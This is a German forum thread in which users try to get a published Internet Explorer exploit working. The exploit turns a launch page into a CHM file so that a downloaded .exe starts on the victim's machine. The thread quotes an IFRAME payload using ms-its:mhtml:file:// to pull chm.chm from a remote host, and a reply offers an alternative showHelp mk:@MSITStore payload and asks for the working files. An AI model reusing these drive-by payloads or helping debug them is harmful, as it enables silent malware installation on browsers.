Exploit für Internet Explorer testen?

hi

ich hab mal versucht diesen exploit zu testen --> http://www.securityfocus.com/archive/1/354447

habe auch die LAUNCH.HTML in chm.chm konvertiert.

geht auch soweit, die *.exe wird gedownloaded u. gestartet

im 2. teil steht ja das man mit:

<IFRAME SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

die datei chm.chm starten kann.

nur genau das geht nicht! was bedeutet denn mhtml:file://C:\ss.MHT! ?

wenn ich das weglasse gehts, bis auf das activx im browser aktiviert sein muss.

kann mir da jemand weiterhelfen?

thx
 
hmmm also ich würde mal

showHelp("mk:@MSITStore:ss.chm::http://www.example.com//chm.chm::/files/launch.html");

versuchen, wärste so freundlich, falls es funktioniert, mir das ganze als zip zu mailen? ich komme nämlich beim konvertieren nicht weiter, bzw. sag mir wie ich was konvertieren muss, wäre sehr freundlich.

mfg freddeh
 
Zurück
Oben